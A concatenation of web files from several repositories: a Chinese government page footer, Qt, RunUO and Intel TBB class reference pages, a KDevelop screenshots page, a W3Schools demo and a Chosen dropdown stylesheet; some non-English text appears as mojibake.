<td height="5" align="right">¡¾<a href='#' onclick="preview()">Ô¤ÀÀ²¢´òÓ¡</a>¡¿¡¡/¡¡¡¾<a href="javascRIpt:window.close();">¹Ø±Õ´°¿Ú</a>¡¿</td>
</tr>
</tbody>
</table>
<scRIpt language="javascRIpt">
function preview() {
bdhtml=window.document.body.innerHTML;
sprnstr="<!--startprint-->";
eprnstr="<!--endprint-->";
prnhtml=bdhtml.substr(bdhtml.indexOf(sprnstr)+17);
prnhtml=prnhtml.substring(0,prnhtml.indexOf(eprnstr));
window.document.body.innerHTML=prnhtml;
window.print();
}
</scRIpt>
<table width="680" height="20" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td height="5" align="right"><!-- GWD SHARE BEGIN µ×²¿ºáÌõ·ÖÏí´úÂë-->
<div class="mainShareDiv_24">
<a href="//share.gwd.gov.cn/" target="_blank"><div id="shareLeftLink"></div></a>
<div id="gwdShare_con_1">
<div class="gwdshare_t gwds_tools_24 get-codes-gwdshare">
<a class="gwds_people gwds_bottom_leftbutton"></a>
<a class="gwds_tsina gwds_bottom_centerbutton"></a>
<a class="gwds_tqq gwds_bottom_centerbutton"></a>
<span class="gwds_more gwds_bottom_more"></span>
</div>
</div>
</div>
<!-- GWD SHARE END --></td>
</tr>
</tbody>
</table></td>
</tr>
</table>
<div style="margin:0 auto; width:1000px; border:none; background:#f2f2f2; text-align:center; padding:10px 0" align="center">
<p style="height:20px; line-height:20px; font-size:12px; font-family:'ËÎÌå'; text-align:center;">Ö÷°ìµ¥Î»£ºÍ©°ØÏØÕþ¸®°ì¹«ÊÒ¡¡½¨Õ¾Î¬»¤£ºÍ©°ØÏصç×ÓÕþÎñ°ì¹«ÊÒ¡¡µç»°£º0377-68219821¡¡E-mail£ºtbxzfyx@163.com</p>
<p style="height:20px; line-height:20px; font-size:12px; font-family:'ËÎÌå'; text-align:center;"><span style="height:20px; line-height:20px; font-size:12px; font-family:'ËÎÌå'; text-align:center;">±¾Õ¾ÄÚÈÝδ¾Ðí¿É£¬ÇëÎð×ªÔØ¡¡¡¡±¸°¸ºÅ£ºÔ¥ICP±¸13018982</span>
<span style="height:20px; line-height:20px; font-size:12px; font-family:'ËÎÌå'; text-align:center;"><scRIpt type='text/javascRIpt' src='http://wm.01ny.cn/jsq/index.php?catid=5102'></scRIpt></span>
</p>
<div style="width:300px;margin:0 auto; padding:0;">
<a target="_blank" href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=41133002000101" style="display:inline-block;text-decoration:none;height:20px;line-height:20px;"><img src="/gongan.png" style="float:left;"/><p style="float:left;height:20px;line-height:20px;margin: 0px 0px 0px 5px; color:#939393;">Ô¥¹«Íø°²±¸ 41133002000101ºÅ</p></a>
</div>
<p style="height:25px; line-height:25px; font-size:12px; font-family:'ËÎÌå'; text-align:center;"><span style="line-height:25px;">Copyright 2004 -
<scRIpt type="text/javascRIpt">var copyY=new Date();document.write(copyY.getYear())</scRIpt>
</span>¡¡<a href="/admin.php" target="_blank" class="navlist">¹ÜÀíµÇ½</a></p>
<div style="position:relative; width:90px; left:-5px; top:-80px; margin-bottom:-40px; float:left;"><scRIpt type="text/javascRIpt">document.write(unescape("%3Cspan id='_ideConac' %3E%3C/span%3E%3CscRIpt src='http://dcs.conac.cn/js/17/263/1698/40843970/CA172631698408439700001.js' type='text/javascRIpt'%3E%3C/scRIpt%3E"));</scRIpt></div>
</div>
<!--Á¿»¯´úÂ벿Êð·½°¸-->
<scRIpt type='text/javascRIpt' src='http://static.gridsumdissector.com/js/Clients/GWD-802542-575F63/gs.js'></scRIpt>
<!--Á¿»¯´úÂ벿Êð·½°¸-->
<div id="guanbi" style="width: 204px; height: 310px; position: fixed; top: 210px; right: 30px; display: block; z-index: 100; ">
<!-- GWD SHARE BEGIN Ò³ÃæÓҲม¶¯·ÖÏí´úÂë-->
<div style="position:relative;float:right;">
<div id="gwdShare_win_2">
<div id="gwdShare_con_2" style="display:none;height:51px;">
<div class="gwdshare_t gwds_tools_24 get-codes-gwdshare">
<a class="gwds_people gwds_right_button"></a>
<a class="gwds_tsina gwds_right_button"></a>
<a class="gwds_tqq gwds_right_button"></a>
<span class="gwds_more gwds_right_more"></span>
</div>
</div>
</div>
</div>
<!-- GWD SHARE END -->
<scRIpt>
function guanbi(){
var d=document.getElementById('guanbi');
d.style.display="none";
}
</scRIpt>
</body>
</html>
<scRIpt type="text/javascRIpt"></scRIpt> |
doc/html/qstylefactory.html | muromec/qtopia-ezx | <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Qt 4.3: QStyleFactory Class Reference</title>
<link href="classic.css" rel="stylesheet" type="text/css" />
</head>
<body>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" valign="top" width="32"><a href="http://www.trolltech.com/products/qt"><img src="images/qt-logo.png" align="left" width="32" height="32" border="0" /></a></td>
<td width="1"> </td><td class="postheader" valign="center"><a href="index.html"><font color="#004faf">Home</font></a> · <a href="classes.html"><font color="#004faf">All Classes</font></a> · <a href="mainclasses.html"><font color="#004faf">Main Classes</font></a> · <a href="groups.html"><font color="#004faf">Grouped Classes</font></a> · <a href="modules.html"><font color="#004faf">Modules</font></a> · <a href="functions.html"><font color="#004faf">Functions</font></a></td>
<td align="right" valign="top" width="230"><a href="http://www.trolltech.com"><img src="images/trolltech-logo.png" align="right" width="203" height="32" border="0" /></a></td></tr></table><h1 class="title">QStyleFactory Class Reference<br /><span class="small-subtitle">[<a href="qtgui.html">QtGui</a> module]</span>
</h1>
<p>The QStyleFactory class creates <a href="qstyle.html">QStyle</a> objects. <a href="#details">More...</a></p>
<pre> #include <QStyleFactory></pre><ul>
<li><a href="qstylefactory-members.html">List of all members, including inherited members</a></li>
</ul>
<a name="static-public-members"></a>
<h3>Static Public Members</h3>
<ul>
<li><div class="fn"/>QStyle * <b><a href="qstylefactory.html#create">create</a></b> ( const QString & <i>key</i> )</li>
<li><div class="fn"/>QStringList <b><a href="qstylefactory.html#keys">keys</a></b> ()</li>
</ul>
<a name="details"></a>
<hr />
<h2>Detailed Description</h2>
<p>The QStyleFactory class creates <a href="qstyle.html">QStyle</a> objects.</p>
<p>The <a href="qstyle.html">QStyle</a> class is an abstract base class that encapsulates the look and feel of a GUI. QStyleFactory creates a <a href="qstyle.html">QStyle</a> object using the <a href="qstylefactory.html#create">create</a>() function and a key identifying the style. The styles are either built-in or dynamically loaded from a style plugin (see <a href="qstyleplugin.html">QStylePlugin</a>).</p>
<p>The valid keys can be retrieved using the <a href="qstylefactory.html#keys">keys</a>() function. Typically they include "windows", "motif", "cde", "plastique" and "cleanlooks". Depending on the platform, "windowsxp", "windowsvista" and "macintosh" may be available. Note that keys are case insensitive.</p>
<p>See also <a href="qstyle.html">QStyle</a>.</p>
<hr />
<h2>Member Function Documentation</h2>
<h3 class="fn"><a name="create"></a><a href="qstyle.html">QStyle</a> * QStyleFactory::create ( const <a href="qstring.html">QString</a> & <i>key</i> ) <tt> [static]</tt></h3>
<p>Creates a <a href="qstyle.html">QStyle</a> object that matches the given <i>key</i>. This is either a built-in style, or a style from a style plugin.</p>
<p>Note that keys are case insensitive.</p>
<p>See also <a href="qstylefactory.html#keys">keys</a>().</p>
<h3 class="fn"><a name="keys"></a><a href="qstringlist.html">QStringList</a> QStyleFactory::keys () <tt> [static]</tt></h3>
<p>Returns the list of valid keys, i.e. the keys this factory can create styles for.</p>
<p>See also <a href="qstylefactory.html#create">create</a>().</p>
<p /><address><hr /><div align="center">
<table width="100%" cellspacing="0" border="0"><tr class="address">
<td width="30%">Copyright © 2008 <a href="trolltech.html">Trolltech</a></td>
<td width="40%" align="center"><a href="trademarks.html">Trademarks</a></td>
<td width="30%" align="right"><div align="right">Qt 4.3.6</div></td>
</tr></table></div></address></body>
</html>
|
app/src/main/assets/html/en/_2.html | SrirangaDigital/shankara-android | <html>
<head>
<meta charset="UTF-8">
<link rel="stylesheet" href="assets/stylesheet-en.css" />
</head>
<body class="eng">
<div class='authorline'>iti śrīmatparamahaṁsaparivrājakācāryasya śrīgōvindabhagavatpūjyapādaśiṣyasya śrīmacchaṅkarabhagavataḥ kr̥tau kēnōpaniṣadvākyabhāṣyam sampūrṇam ॥ </div></body>
</html>
|
docs/types/MetalBox.html | alucardxlx/caoticamente-shards | <html>
<head>
<title>RunUO Documentation - Class Overview - MetalBox</title>
</head>
<body bgcolor="white" style="font-family: Courier New" text="#000000" link="#000000" vlink="#000000" alink="#808080">
<h4><a href="../namespaces/Server.Items.html">Back to Server.Items</a></h4>
<h2>MetalBox : <!-- DBG-1 --><a href="LockableContainer.html">LockableContainer</a>, <!-- DBG-2.2 --><a href="IEntity.html">IEntity</a>, <!-- DBG-2.2 --><a href="IPoint3D.html">IPoint3D</a>, <!-- DBG-2.2 --><a href="IPoint2D.html">IPoint2D</a>, <!-- DBG-2.1 --><font color="blue">IComparable</font>, <!-- DBG-2.1 --><font color="blue">IComparable</font><<a href="IEntity.html">IEntity</a>>, <!-- DBG-2.2 --><a href="IHued.html">IHued</a>, <!-- DBG-2.1 --><font color="blue">IComparable</font><<a href="Item.html">Item</a>>, <!-- DBG-2.2 --><a href="ISerializable.html">ISerializable</a>, <!-- DBG-2.2 --><a href="ITelekinesisable.html">ITelekinesisable</a>, <!-- DBG-2.2 --><a href="ILockable.html">ILockable</a>, <!-- DBG-2.2 --><a href="ILockpickable.html">ILockpickable</a>, <!-- DBG-2.2 --><a href="ICraftable.html">ICraftable</a>, <!-- DBG-2.2 --><a href="IShipwreckedItem.html">IShipwreckedItem</a></h2>
<h4>Derived Types: <!-- DBG-3 --><a href="KronusScrollBox.html">KronusScrollBox</a></h4>
(<font color="blue">ctor</font>) MetalBox()<br>
(<font color="blue">ctor</font>) MetalBox( <!-- DBG-0 --><a href="Serial.html">Serial</a> serial )<br>
<font color="blue">virtual</font> <font color="blue">void</font> Deserialize( <!-- DBG-0 --><a href="GenericReader.html">GenericReader</a> reader )<br>
<font color="blue">virtual</font> <font color="blue">void</font> Serialize( <!-- DBG-0 --><a href="GenericWriter.html">GenericWriter</a> writer )<br>
</body>
</html>
|
lang/ru/3.4/screenshots2.html | KDE/kdev-www | <?php module_head("KDevelop $k_series_version óÎÉÍËÉ ÜËÒÁÎÁ, ÓÔÒÁÎÉÃÁ 2");?>
<table width="100%" cellspacing=2 cellpadding=2 border=0>
<tr>
<td align=center><a href="index.html?filename=<?php echo $k_base_version; ?>/screenshots1.html">óÔÒÁÎÉÃÁ 1</a>
<td align=center>óÔÒÁÎÉÃÁ 2
<td align=center><a href="index.html?filename=<?php echo $k_base_version; ?>/screenshots3.html">óÔÒÁÎÉÃÁ 3</a>
</tr>
</table>
<table width="100%" cellspacing=2 cellpadding=2 border=0>
<tr>
<th class=header width="50%" align=center>ðÁÒÁÍÅÔÒÙ ÍÅÎÅÄÖÅÒÁ QMake × ÐÁÒÁÍÅÔÒÁÈ ÐÒÏÅËÔÁ</th>
<th class=header width="50%" align=center>íÅÎÅÄÖÅÒ QMake ÐÏÓÌÅ ÚÁÇÒÕÚËÉ ÐÒÏÅËÔÁ</th>
</tr>
<tr>
<td class=odd width="50%" align=center>
<a href="graphics/screenshots/3.4/qmopts.png"><img border="0" src="graphics/screenshots/3.4/thumbs/qmopts.png" width="140" height="100" alt="ðÁÒÁÍÅÔÒÙ ÍÅÎÅÄÖÅÒÁ QMake × ÐÁÒÁÍÅÔÒÁÈ ÐÒÏÅËÔÁ"/></a>
<div align="justify">
ðÁÒÁÍÅÔÒÙ ÍÅÎÅÄÖÅÒÁ QMake × ÐÁÒÁÍÅÔÒÁÈ ÐÒÏÅËÔÁ.
÷ËÌÀÞÁÅÔ ÎÁÓÔÒÏÊËÕ ÄÉÁÌÏÇÁ ÐÅÒÅÚÁÇÒÕÚËÉ ÐÒÏÅËÔÁ (ÓÍÏÔÒÉÔÅ ÓÎÉÍÏË Ó ÐÅÒÅÚÁÇÒÕÚËÏÊ ÐÒÏÅËÔÁ).
ôÁËÖÅ ÐÏËÁÚÁÎÁ ×ÏÚÍÏÖÎÏÓÔØ ÐÏÄÄÅÒÖËÉ ÉÍÅÎ ÆÁÊÌÏ× ×ÉÄÁ $$FOOBAR/somefile.cpp.
</div>
</td>
<td class=odd width="50%" align=center>
<a href="graphics/screenshots/3.4/qm.png"><img border="0" src="graphics/screenshots/3.4/thumbs/qm.png" width="140" height="100" alt="íÅÎÅÄÖÅÒ QMake ÐÏÓÌÅ ÚÁÇÒÕÚËÉ ÐÒÏÅËÔÁ"/></a>
</td>
</tr>
<tr>
<th class=header width="50%" align=center>ëÏÎÆÉÇÕÒÁÃÉÑ ÐÏÄÐÒÏÅËÔÁ QMake</th>
<th class=header width="50%" align=center>÷ÏÚÍÏÖÎÏÓÔØ ÐÅÒÅÚÁÇÒÕÚËÉ ÐÒÏÅËÔÁ</th>
</tr>
<tr>
<td class=odd width="50%" align=center>
<a href="graphics/screenshots/3.4/qmqt4conf.png"><img border="0" src="graphics/screenshots/3.4/thumbs/qmqt4conf.png" width="140" height="100" alt="ëÏÎÆÉÇÕÒÁÃÉÑ ÐÏÄÐÒÏÅËÔÁ QMake"/></a>
<p>îÏ×ÙÅ Qt4 ÏÐÃÉÉ ÄÌÑ QtXml, QtTest É Co (ÄÏÓÔÕÐÎÙ ÐÏ ÎÁÖÁÔÉÀ ÐÒÁ×ÏÊ ËÎÏÐËÉ ÍÙÛÉ × ÍÅÎÀ ×ÅÒÈÎÅÇÏ ÕÒÏ×ÎÑ ÍÅÎÅÄÖÅÒÁ QMake)</p>
</td>
<td class=odd width="50%" align=center>
<a href="graphics/screenshots/3.4/qmreload.png"><img border="0" src="graphics/screenshots/3.4/thumbs/qmreload.png" width="140" height="100" alt="÷ÏÚÍÏÖÎÏÓÔØ ÐÅÒÅÚÁÇÒÕÚËÉ ÐÒÏÅËÔÁ"/></a>
<p>ðÏËÁÚÁÎÁ ×ÏÚÍÏÖÎÏÓÔØ ÐÅÒÅÚÁÇÒÕÚËÉ ÐÒÏÅËÔÁ, ËÏÔÏÒÁÑ ÄÏÓÔÕÐÎÁ ÔÏÌØËÏ ÄÌÑ ÐÒÏÅËÔÏ× Ó ÉÓÐÏÌØÚÏ×ÁÎÉÅÍ ÍÅÎÅÄÖÅÒÁ QMake</p>
</td>
</tr>
</table>
<?php module_tail();?>
|
doc/html/a00071.html | Soth1985/tbb | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.4"/>
<title>tbb::flow::interface7::indexer_node< T0, T1, T2, T3, T4 > Class Template Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<!-- end header part -->
<!-- Generated by Doxygen 1.8.4 -->
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="pages.html"><span>Related Pages</span></a></li>
<li><a href="modules.html"><span>Modules</span></a></li>
<li><a href="namespaces.html"><span>Namespaces</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="hierarchy.html"><span>Class Hierarchy</span></a></li>
<li><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="a00233.html">tbb</a></li><li class="navelem"><b>flow</b></li><li class="navelem"><b>interface7</b></li><li class="navelem"><a class="el" href="a00071.html">indexer_node< T0, T1, T2, T3, T4 ></a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#pub-types">Public Types</a> |
<a href="#pub-methods">Public Member Functions</a> |
<a href="a00350.html">List of all members</a> </div>
<div class="headertitle">
<div class="title">tbb::flow::interface7::indexer_node< T0, T1, T2, T3, T4 > Class Template Reference</div> </div>
</div><!--header-->
<div class="contents">
<div class="dynheader">
Inheritance diagram for tbb::flow::interface7::indexer_node< T0, T1, T2, T3, T4 >:</div>
<div class="dyncontent">
<div class="center">
<img src="a00071.png" usemap="#tbb::flow::interface7::indexer_node< T0, T1, T2, T3, T4 >_map" alt=""/>
<map id="tbb::flow::interface7::indexer_node< T0, T1, T2, T3, T4 >_map" name="tbb::flow::interface7::indexer_node< T0, T1, T2, T3, T4 >_map">
</map>
</div></div>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pub-types"></a>
Public Types</h2></td></tr>
<tr class="memitem:ae9798eaf903fa100e31a12dea412d573"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ae9798eaf903fa100e31a12dea412d573"></a>
typedef tuple< T0, T1, T2, T3, T4 > </td><td class="memItemRight" valign="bottom"><b>InputTuple</b></td></tr>
<tr class="separator:ae9798eaf903fa100e31a12dea412d573"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:af96acdaef97af6acca15e1f930cf8a97"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="af96acdaef97af6acca15e1f930cf8a97"></a>
typedef internal::tagged_msg<br class="typebreak"/>
< size_t, T0, T1, T2, T3, T4 > </td><td class="memItemRight" valign="bottom"><b>output_type</b></td></tr>
<tr class="separator:af96acdaef97af6acca15e1f930cf8a97"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:ab5ad5dede53da29f7643c24e5d47fd8c"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ab5ad5dede53da29f7643c24e5d47fd8c"></a>
typedef <br class="typebreak"/>
internal::unfolded_indexer_node<br class="typebreak"/>
< InputTuple > </td><td class="memItemRight" valign="bottom"><b>unfolded_type</b></td></tr>
<tr class="separator:ab5ad5dede53da29f7643c24e5d47fd8c"><td class="memSeparator" colspan="2"> </td></tr>
</table><table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pub-methods"></a>
Public Member Functions</h2></td></tr>
<tr class="memitem:ab5395c9d6896408234ec97c030bb014b"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ab5395c9d6896408234ec97c030bb014b"></a>
 </td><td class="memItemRight" valign="bottom"><b>indexer_node</b> (<a class="el" href="a00061.html">graph</a> &g)</td></tr>
<tr class="separator:ab5395c9d6896408234ec97c030bb014b"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:aee0ef34819a584da59a913ade2c6c30f"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aee0ef34819a584da59a913ade2c6c30f"></a>
 </td><td class="memItemRight" valign="bottom"><b>indexer_node</b> (const <a class="el" href="a00066.html">indexer_node</a> &other)</td></tr>
<tr class="separator:aee0ef34819a584da59a913ade2c6c30f"><td class="memSeparator" colspan="2"> </td></tr>
<tr class="memitem:aa1f6d3cdb2ae66b44f11abf28deb74b1"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aa1f6d3cdb2ae66b44f11abf28deb74b1"></a>
void </td><td class="memItemRight" valign="bottom"><b>set_name</b> (const char *name)</td></tr>
<tr class="separator:aa1f6d3cdb2ae66b44f11abf28deb74b1"><td class="memSeparator" colspan="2"> </td></tr>
</table>
<hr/>The documentation for this class was generated from the following file:<ul>
<li><a class="el" href="a00190.html">flow_graph.h</a></li>
</ul>
</div><!-- contents -->
<hr>
<p></p>
Copyright © 2005-2014 Intel Corporation. All Rights Reserved.
<p></p>
Intel, Pentium, Intel Xeon, Itanium, Intel XScale and VTune are
registered trademarks or trademarks of Intel Corporation or its
subsidiaries in the United States and other countries.
<p></p>
* Other names and brands may be claimed as the property of others.
|
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/js/tryjs_area_target.html | platinhom/ManualHom | <!DOCTYPE html>
<html>
<!-- Mirrored from www.w3schools.com/js/tryjs_area_target.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:14:25 GMT -->
<body>
<img src="planets.gif" width="145" height="126" usemap="#planetmap">
<map name="planetmap">
<area id="venus" shape="circle" coords="124,58,8" alt="Venus" href="venus.html" target="_self">
</map>
<p>Click the button to return the value of the target attribute for the "venus" area in the image-map.</p>
<button onclick="myFunction()">Try it</button>
<p id="demo"></p>
<script>
function myFunction() {
var x = document.getElementById("venus").target;
document.getElementById("demo").innerHTML = x;
}
</script>
</body>
<!-- Mirrored from www.w3schools.com/js/tryjs_area_target.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:14:25 GMT -->
</html> |
wp-content/themes/wp_melano_3.8/includes/options/css/custom.css | chinhlv91/wp_melano | /*
*
* Don't forget to set custom_css to true in the defaults.php file!
*
*/
@import url('options.css');
.redux-opts-group-tab .form-table tr th {
width: 36%;
}
.redux-opts-group-tab .form-table tr th span:first-child {
margin-top: 10px;
}
/* @group Base */
.chzn-container {
font-size: 13px;
position: relative;
display: inline-block;
zoom: 1;
*display: inline;
width:200px !important;
}
.chzn-container .chzn-drop {
background: #fff;
border: 1px solid #aaa;
border-top: 0;
position: absolute;
top: 29px;
left: 0;
-webkit-box-shadow: 0 4px 5px rgba(0,0,0,.15);
-moz-box-shadow : 0 4px 5px rgba(0,0,0,.15);
box-shadow : 0 4px 5px rgba(0,0,0,.15);
z-index: 1010;
width:198px !important;
}
/* @end */
/* @group Single Chosen */
.chzn-container-single .chzn-single {
background-color: #ffffff;
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ffffff', endColorstr='#eeeeee', GradientType=0 );
background-image: -webkit-gradient(linear, 0 0, 0 100%, color-stop(20%, #ffffff), color-stop(50%, #f6f6f6), color-stop(52%, #eeeeee), color-stop(100%, #f4f4f4));
background-image: -webkit-linear-gradient(top, #ffffff 20%, #f6f6f6 50%, #eeeeee 52%, #f4f4f4 100%);
background-image: -moz-linear-gradient(top, #ffffff 20%, #f6f6f6 50%, #eeeeee 52%, #f4f4f4 100%);
background-image: -o-linear-gradient(top, #ffffff 20%, #f6f6f6 50%, #eeeeee 52%, #f4f4f4 100%);
background-image: linear-gradient(#ffffff 20%, #f6f6f6 50%, #eeeeee 52%, #f4f4f4 100%);
-webkit-border-radius: 5px;
-moz-border-radius : 5px;
border-radius : 5px;
-moz-background-clip : padding;
-webkit-background-clip: padding-box;
background-clip : padding-box;
border: 1px solid #aaaaaa;
-webkit-box-shadow: 0 0 3px #ffffff inset, 0 1px 1px rgba(0,0,0,0.1);
-moz-box-shadow : 0 0 3px #ffffff inset, 0 1px 1px rgba(0,0,0,0.1);
box-shadow : 0 0 3px #ffffff inset, 0 1px 1px rgba(0,0,0,0.1);
display: block;
overflow: hidden;
white-space: nowrap;
position: relative;
height: 23px;
line-height: 24px;
padding: 0 0 0 8px;
color: #444444;
text-decoration: none;
}
.chzn-container-single .chzn-default {
color: #999;
}
.chzn-container-single .chzn-single span {
margin-right: 26px;
display: block;
overflow: hidden;
white-space: nowrap;
-o-text-overflow: ellipsis;
-ms-text-overflow: ellipsis;
text-overflow: ellipsis;
}
.chzn-container-single .chzn-single abbr {
display: block;
position: absolute;
right: 26px;
top: 6px;
width: 12px;
height: 12px;
font-size: 1px;
}
.chzn-container-single .chzn-single abbr:hover {
background-position: -42px -10px;
}
.chzn-container-single.chzn-disabled .chzn-single abbr:hover {
background-position: -42px -10px;
}
.chzn-container-single .chzn-single div {
position: absolute;
right: 0;
top: 0;
display: block;
height: 100%;
width: 18px;
}
.chzn-container-single .chzn-single div b {
display: block;
width: 100%;
height: 100%;
}
.chzn-container-single .chzn-search {
padding: 3px 4px;
position: relative;
margin: 0;
white-space: nowrap;
z-index: 1010;
}
.chzn-container-single .chzn-search input {
margin: 1px 0;
padding: 4px 20px 4px 5px;
outline: 0;
border: 1px solid #aaa;
font-family: sans-serif;
font-size: 1em;
width:190px !important;
}
.chzn-container-single .chzn-drop {
-webkit-border-radius: 0 0 4px 4px;
-moz-border-radius : 0 0 4px 4px;
border-radius : 0 0 4px 4px;
-moz-background-clip : padding;
-webkit-background-clip: padding-box;
background-clip : padding-box;
}
/* @end */
.chzn-container-single-nosearch .chzn-search input {
position: absolute;
left: -9000px;
}
/* @group Multi Chosen */
.chzn-container-multi .chzn-choices {
background-color: #fff;
background-image: -webkit-gradient(linear, 0 0, 0 100%, color-stop(1%, #eeeeee), color-stop(15%, #ffffff));
background-image: -webkit-linear-gradient(top, #eeeeee 1%, #ffffff 15%);
background-image: -moz-linear-gradient(top, #eeeeee 1%, #ffffff 15%);
background-image: -o-linear-gradient(top, #eeeeee 1%, #ffffff 15%);
background-image: linear-gradient(#eeeeee 1%, #ffffff 15%);
border: 1px solid #aaa;
margin: 0;
padding: 0;
cursor: text;
overflow: hidden;
height: auto !important;
height: 1%;
position: relative;
}
.chzn-container-multi .chzn-choices li {
float: left;
list-style: none;
}
.chzn-container-multi .chzn-choices .search-field {
white-space: nowrap;
margin: 0;
padding: 0;
}
.chzn-container-multi .chzn-choices .search-field input {
color: #666;
background: transparent !important;
border: 0 !important;
font-family: sans-serif;
font-size: 100%;
height: 15px;
padding: 5px;
margin: 1px 0;
outline: 0;
-webkit-box-shadow: none;
-moz-box-shadow : none;
box-shadow : none;
}
.chzn-container-multi .chzn-choices .search-field .default {
color: #999;
}
.chzn-container-multi .chzn-choices .search-choice {
-webkit-border-radius: 3px;
-moz-border-radius : 3px;
border-radius : 3px;
-moz-background-clip : padding;
-webkit-background-clip: padding-box;
background-clip : padding-box;
background-color: #e4e4e4;
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#f4f4f4', endColorstr='#eeeeee', GradientType=0 );
background-image: -webkit-gradient(linear, 0 0, 0 100%, color-stop(20%, #f4f4f4), color-stop(50%, #f0f0f0), color-stop(52%, #e8e8e8), color-stop(100%, #eeeeee));
background-image: -webkit-linear-gradient(top, #f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
background-image: -moz-linear-gradient(top, #f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
background-image: -o-linear-gradient(top, #f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
background-image: linear-gradient(#f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
-webkit-box-shadow: 0 0 2px #ffffff inset, 0 1px 0 rgba(0,0,0,0.05);
-moz-box-shadow : 0 0 2px #ffffff inset, 0 1px 0 rgba(0,0,0,0.05);
box-shadow : 0 0 2px #ffffff inset, 0 1px 0 rgba(0,0,0,0.05);
color: #333;
border: 1px solid #aaaaaa;
line-height: 13px;
padding: 3px 20px 3px 5px;
margin: 3px 0 3px 5px;
position: relative;
cursor: default;
}
.chzn-container-multi .chzn-choices .search-choice.search-choice-disabled {
background-color: #e4e4e4;
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#f4f4f4', endColorstr='#eeeeee', GradientType=0 );
background-image: -webkit-gradient(linear, 0% 0%, 0% 100%, color-stop(20%, #f4f4f4), color-stop(50%, #f0f0f0), color-stop(52%, #e8e8e8), color-stop(100%, #eeeeee));
background-image: -webkit-linear-gradient(top, #f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
background-image: -moz-linear-gradient(top, #f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
background-image: -o-linear-gradient(top, #f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
background-image: -ms-linear-gradient(top, #f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
background-image: linear-gradient(top, #f4f4f4 20%, #f0f0f0 50%, #e8e8e8 52%, #eeeeee 100%);
color: #666;
border: 1px solid #cccccc;
padding-right: 5px;
}
.chzn-container-multi .chzn-choices .search-choice-focus {
background: #d4d4d4;
}
.chzn-container-multi .chzn-choices .search-choice .search-choice-close {
display: block;
position: absolute;
right: 3px;
top: 4px;
width: 12px;
height: 12px;
font-size: 1px;
}
.chzn-container-multi .chzn-choices .search-choice .search-choice-close:hover {
background-position: -42px -10px;
}
.chzn-container-multi .chzn-choices .search-choice-focus .search-choice-close {
background-position: -42px -10px;
}
/* @end */
/* @group Results */
.chzn-container .chzn-results {
margin: 0 4px 4px 0;
max-height: 240px;
padding: 0 0 0 4px;
position: relative;
overflow-x: hidden;
overflow-y: auto;
-webkit-overflow-scrolling: touch;
}
.chzn-container-multi .chzn-results {
margin: -1px 0 0;
padding: 0;
}
.chzn-container .chzn-results li {
display: none;
line-height: 15px;
padding: 5px 6px;
margin: 0;
list-style: none;
}
.chzn-container .chzn-results .active-result {
cursor: pointer;
display: list-item;
}
.chzn-container .chzn-results .highlighted {
background-color: #3875d7;
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#3875d7', endColorstr='#2a62bc', GradientType=0 );
background-image: -webkit-gradient(linear, 0 0, 0 100%, color-stop(20%, #3875d7), color-stop(90%, #2a62bc));
background-image: -webkit-linear-gradient(top, #3875d7 20%, #2a62bc 90%);
background-image: -moz-linear-gradient(top, #3875d7 20%, #2a62bc 90%);
